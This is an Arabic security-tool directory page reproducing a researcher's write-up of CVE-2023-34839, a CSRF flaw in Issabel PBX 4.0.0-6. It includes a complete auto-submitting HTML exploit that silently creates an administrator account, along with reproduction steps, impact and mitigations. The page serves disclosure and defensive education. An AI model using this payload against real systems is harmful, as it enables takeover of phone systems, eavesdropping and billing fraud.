Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-34839 — CVE-2023-34839 هي ثغرة من نوع تزوير الطلب عبر المواقع (CSRF) تم اكتشافها في Issabel PBX الإصدار 4.0.0-6، وهي منصة اتصالات موحدة مفتوحة المصدر واسعة الاستخدام. | Kitploit
أدوات/GitHubGitHub/sahiloj/cve-2023-34839
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالأوراق والأبحاثالتعلم والتعليم
GitHubsahiloj/cve-2023-34839

CVE-2023-34839

CVE-2023-34839 هي ثغرة من نوع تزوير الطلب عبر المواقع (CSRF) تم اكتشافها في Issabel PBX الإصدار 4.0.0-6، وهي منصة اتصالات موحدة مفتوحة المصدر واسعة الاستخدام.

عرض المستودع
53منذ 6 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-34839 — ترقية صلاحيات عبر CSRF في Issabel PBX 4.0.0-6

CVE Severity CVSS Affected Version


جدول المحتويات

  • نظرة عامة
  • تفاصيل الثغرة
  • البرامج المتأثرة
  • درجة CVSS
  • سيناريو الهجوم
  • إثبات المفهوم
  • خطوات إعادة الإنتاج
  • التأثير
  • الإصلاح
  • المراجع
  • إخلاء مسؤولية

نظرة عامة

CVE-2023-34839 هي ثغرة من نوع تزوير الطلبات عبر المواقع (CSRF) تم اكتشافها في Issabel PBX الإصدار 4.0.0-6، وهو منصة اتصالات موحدة مفتوحة المصدر واسعة الاستخدام. توجد الثغرة في نقطة نهاية إدارة المستخدمين وتسمح لمهاجم غير موثوق عن بُعد بإنشاء حساب مدير جديد بهدوء عن طريق خداع مدير تمت المصادقة عليه حاليًا لزيارة صفحة ويب مصممة خصيصًا.


تفاصيل الثغرة

لا يطبق Issabel PBX 4.0.0-6 حماية CSRF (مثل رموز المزامنة، أو سمات ملفات تعريف الارتباط SameSite، أو التحقق من رأس Origin / Referer) على نقطة نهاية إنشاء المستخدم:

root@kitploit:~
POST /index.php?menu=userlist&action=new

نظرًا لأن التطبيق يعتمد فقط على ملفات تعريف الارتباط الخاصة بالجلسة للمصادقة ولا ينفذ أي تحقق من صحة الطلبات التي تغير الحالة، فسيتم قبول أي طلب POST مزيف من أي مصدر ومعالجته بكامل صلاحيات جلسة المدير المسجل دخوله.

السبب الجذري: عدم وجود التحقق من رمز مكافحة CSRF في نقاط النهاية الإدارية التي تغير الحالة.

فئة الثغرة: CWE-352 — تزوير الطلبات عبر المواقع (CSRF)


البرامج المتأثرة

البرنامجالإصدارالحالة
Issabel PBX4.0.0-6معرضة ✔
  • الصفحة الرئيسية للمورّد: https://www.issabel.org/
  • الكود المصدري: https://github.com/IssabelFoundation/issabelPBX

درجة CVSS


سيناريو الهجوم

يمكن للمهاجم استغلال هذه الثغرة باتباع الخطوات عالية المستوى التالية:

  1. إنشاء صفحة HTML ضارة تحتوي على نموذج مخفي يستهدف نقطة نهاية إنشاء المستخدم في Issabel PBX بقيم يتحكم بها المهاجم (اسم المستخدم، كلمة المرور، المجموعة = مدير).
  2. استضافة الصفحة الضارة على خادم أو إرسالها إلى المدير المستهدف عبر بريد إلكتروني تصيدي، أو رسالة محادثة، أو أي وسيلة من وسائل الهندسة الاجتماعية.
  3. انتظار المدير لفتح الرابط أثناء وجوده في جلسة نشطة وموثقة مع تطبيق Issabel PBX.
  4. يقوم المتصفح بإرسال النموذج تلقائيًا باستخدام ملف تعريف ارتباط الجلسة الحالي للضحية، مما يتسبب في إنشاء حساب مدير جديد بهدوء.
  5. يقوم المهاجم بتسجيل الدخول باستخدام بيانات الاعتماد المنشأة حديثًا ويحصل على وصول كامل كمدير إلى نظام PBX، بما في ذلك توجيه المكالمات والتسجيلات وتكوين SIP وجميع إعدادات النظام.

لا يتطلب الأمر أي تفاعل بخلاف زيارة صفحة واحدة من الضحية.


إثبات المفهوم

⚠️ لأغراض تعليمية واختبارات مرخصة فقط.
استبدل localhost باسم المضيف أو عنوان IP الخاص بمثيل Issabel PBX الهدف.
إذا كنت تختبر ضد نقطة نهاية https:// بشهادة ذاتية التوقيع، فيجب عليك أولاً زيارة عنوان URL الهدف في نفس المتصفح وقبول تحذير الشهادة؛ وإلا فسيحظر المتصفح إرسال النموذج عبر المنشأ المختلف.

root@kitploit:~
<html>
  <!-- CSRF Exploit — CVE-2023-34839 -->
  <body>
    <form action="https://localhost/index.php?menu=userlist&action=new" method="POST">
      <input type="hidden" name="save"             value="Save" />
      <input type="hidden" name="name"             value="CSRF" />
      <input type="hidden" name="description"      value="CSRF Test Account" />
      <input type="hidden" name="password1"        value="Test@123" />
      <input type="hidden" name="password2"        value="Test@123" />
      <input type="hidden" name="group"            value="1" />   <!-- 1 = Administrator -->
      <input type="hidden" name="extension"        value="" />
      <input type="hidden" name="webmailuser"      value="" />
      <input type="hidden" name="webmaildomain"    value="" />
      <input type="hidden" name="webmailpassword1" value="" />
      <input type="hidden" name="id_user"          value="" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

ملف الاستغلال متاح أيضًا في هذا المستودع: CSRF Exploit.html


خطوات إعادة الإنتاج

المتطلبات الأساسية

  • مثيل قيد التشغيل من Issabel PBX 4.0.0-6.
  • حساب مدير مع جلسة متصفح نشطة.
  • متصفح على نفس جهاز جلسة المدير.

الخطوة 1 — تسجيل الدخول إلى Issabel PBX كمدير

انتقل إلى واجهة ويب Issabel PBX وقم بتسجيل الدخول باستخدام بيانات اعتماد المدير.

شاشة تسجيل الدخول إلى Issabel PBX


الخطوة 2 — تحضير استغلال CSRF

انسخ كود HTML لإثبات المفهوم أعلاه واحفظه كملف .html، مع استبدال localhost باسم المضيف الفعلي أو عنوان IP لمثيل Issabel الهدف.

يستخدم الاستغلال حقول نموذج مخفية لإرسال طلب POST جديد لإنشاء مستخدم إلى التطبيق بصمت. عند تحميل الصفحة، يقوم JavaScript المضمن بإرسال النموذج فورًا دون أي إجراء مرئي من المستخدم.

ملف HTML لاستغلال CSRF


الخطوة 3 — فتح الاستغلال في نفس المتصفح

افتح ملف HTML المحفوظ في نفس المتصفح (في علامة تبويب جديدة) بينما جلسة المدير لا تزال نشطة. سيتم إرسال النموذج تلقائيًا فور تحميل الصفحة.


الخطوة 4 — التحقق من إنشاء حساب مدير جديد

ارجع إلى لوحة إدارة المستخدمين في Issabel PBX. سيتم إنشاء حساب مستخدم جديد (في إثبات المفهوم هذا، اسمه CSRF) بصلاحيات مدير كاملة — دون أي تفاعل إضافي بخلاف فتح صفحة الاستغلال.

حساب مدير جديد تم إنشاؤه


التأثير

يسمح الاستغلال الناجح لـ CVE-2023-34839 للمهاجم بما يلي:

  • إنشاء حسابات مدير احتيالية على نظام PBX، مما يوفر وصولًا كامل الصلاحيات مستمرًا.
  • تعديل توجيه المكالمات وخطوط SIP، مما يتيح التنصت أو احتيال الفواتير.
  • الوصول إلى تسجيلات البريد الصوتي وسجلات تفاصيل المكالمات (CDRs)، مما يؤدي إلى كشف معلومات حساسة.
  • قفل خروج المديرين الشرعيين عن طريق تغيير كلمات المرور أو حذف الحسابات الحالية.
  • تعطيل الاتصالات عن طريق تغيير أو حذف تكوين PBX.

نظرًا لأن الحساب الاحتيالي يستمر حتى بعد انتهاء جلسة الضحية، يحتفظ المهاجم بالوصول إلى أجل غير مسمى حتى يتم اكتشاف الحساب وإزالته.


الإصلاح

يجب على مسؤولي ومطوري Issabel PBX تطبيق التخفيفات التالية:

  1. تطبيق رموز مكافحة CSRF: إنشاء رمز فريد لا يمكن التنبؤ به ومربوط بالجلسة لكل نموذج يغير الحالة. التحقق من الرمز من جانب الخادم قبل معالجة أي طلب POST.

  2. تطبيق SameSite=Strict أو SameSite=Lax على ملفات تعريف ارتباط الجلسة: يوجه ذلك المتصفحات بعدم إرسال ملفات تعريف الارتباط في الطلبات عبر المواقع، مما يمنع هجمات CSRF الكلاسيكية بشكل فعال في المتصفحات الحديثة.

  3. التحقق من رؤوس Origin و Referer: رفض الطلبات التي لا يتطابق رأس Origin أو Referer الخاص بها مع نطاق التطبيق المتوقع.

  4. طلب إعادة المصادقة للإجراءات الحساسة: مطالبة المدير بإدخال كلمة المرور الحالية قبل السماح بإنشاء حسابات على مستوى المدير.

  5. تطبيق أحدث تصحيحات الأمان: تابع صفحة إصدارات Issabel والمستودع الرسمي للحصول على تصحيحات تعالج هذه الثغرة.


المراجع

  • NVD — CVE-2023-34839
  • OWASP — تزوير الطلبات عبر المواقع (CSRF)
  • CWE-352: تزوير الطلبات عبر المواقع
  • الموقع الرسمي لـ Issabel
  • IssabelFoundation/issabelPBX على GitHub

إخلاء مسؤولية

هذا المستودع مخصص بشكل صارم للأغراض التعليمية والبحث الأمني المصرح به. يجب استخدام المعلومات وكود إثبات المفهوم المقدم هنا فقط ضد الأنظمة التي تمتلكها أو لديك إذن كتابي صريح لاختبارها. الاستخدام غير المصرح به لهذا الاستغلال ضد الأنظمة التي لا تملكها غير قانوني وقد يؤدي إلى الملاحقة الجنائية. لا يتحمل المؤلف أي مسؤولية عن أي إساءة استخدام للمعلومات الواردة في هذا المستودع.

تنزيل الأداة
الحقلالقيمة
معرف CVECVE-2023-34839
التاريخ23 يونيو 2023
الباحثSahil Ojha
المورّدIssabel
المنتجIssabel PBX
الإصدار4.0.0-6
تم الاختبار علىWindows
المقياسالقيمة
متجه CVSS v3.1AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
الدرجة الأساسية8.8 (عالية)
متجه الهجومشبكة
تعقيد الهجوممنخفض
الصلاحيات المطلوبةلا شيء
تفاعل المستخدممطلوب (زيارة مدير)
النطاقغير متغير
السريةعالية
التكاملعالية
التوفرعالية